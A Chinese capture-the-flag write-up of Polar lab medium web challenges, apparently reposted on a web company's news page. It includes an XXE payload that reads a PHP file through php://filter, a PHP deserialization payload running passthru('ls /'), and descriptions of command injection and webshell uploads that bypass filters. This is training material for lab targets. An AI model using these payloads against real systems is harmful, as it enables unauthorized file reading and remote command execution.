尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

Polar靶场-Web中等题目记录(15-32)

Polar靶场-Web中等题目记录(15-32)
📅 发布时间:2026/6/20 17:33:59

ExX?

根据题目,发现存在phpinfo,搜索发现flag

image

很遗憾,flag错误,是假的

没有什么思路,扫描网站目录,发现存在dom.php

image

查看提示,存在xxe漏洞

image

尝试构造利用,读取flag

payload:

<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php" >
]><root><username>&xxe;</username><password>root</password>
</root>

image

image

EZ_Host

查看题目提示,存在?host=YOUR_HOST可执行参数

image

构造命令执行语句

image

读取flag

image

传马

查看题目,上传一句话木马

image

连接获取webshell,使用命令行读取flag

image

笑傲上传

老规矩,上传文件测试

image

监测存在过滤(监测文件内容),尝试上传图片马绕过

image

发现无法连接,查看网站源代码发现include.php

image

尝试使用file参数读取上传一句话木马进行加载

image

image

连接获取flag

image

序列一下

查看题目,反序列化题目

image

构造payload

<?php
class Polar {public $url = 'polarctf.com';public $lt  = 'passthru';public $b   = 'ls /';
}
echo serialize(new Polar);
?>

image

获取flag

image

坏掉的上传页

查看题目,发现上传无法进行

image

找到config.php

image

访问查看,发现默认上传路径

image

构造上传脚本

image

可以正常上传,连接获取flag

image

xxmmll

image

抓包发现提示xxmmll.php

image

读取flag

image

根据报错提示,输入xml语句,成功回显flag

<?xml version="1.0" encoding="UTF-8"?>
<xxe><Message>123123</Message>
</xxe>

image

这个题目有偷鸡的方法,可以扫目录,能直接查看到flag

image

Note

根据提示,查看debug.log

image

没有任何思路,看提示应该是反序列,可以通过logs.txt查看提示,但是不太会

选择偷鸡,访问flag.txt

image

相关新闻

  • 数据结构期末复习:递归与循环核心算法实战总结
  • 云原生时代分布式任务调度的5大突破性变革
  • 【机械臂】基于 RRT 算法在3D 机械臂(主轴)路径规划中的工程实现,在含固定障碍物(副轴、外壳)的约束环境中,找到从起点构型到目标构型的无碰撞路径附matlab代码

最新新闻

  • 小白龙虾软件是什么?OpenClaw本地AI工作流引擎10分钟上手指南
  • Manjaro Sway开发者指南:构建自定义ISO镜像的完整步骤
  • 2026澳洲预科留学中介申请新策略 - 资讯速览
  • 嵌入式GUI开发实战:基于emWin VNC实现远程调试与文件传输
  • 昆明成套钻饰镶金首饰回收总榜,批量估价优势渠道实测排名 - 讯息早知道
  • 2027爱丁堡大学申请中介口碑实测 - 资讯速览

日新闻

  • 信任的进化:技术实现详解——如何用JavaScript构建博弈论模拟器
  • Terrakube自定义工作流:如何集成OPA、Infracost等工具扩展IaC能力
  • grunt-concurrent快速入门:5分钟学会并行运行Grunt任务

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号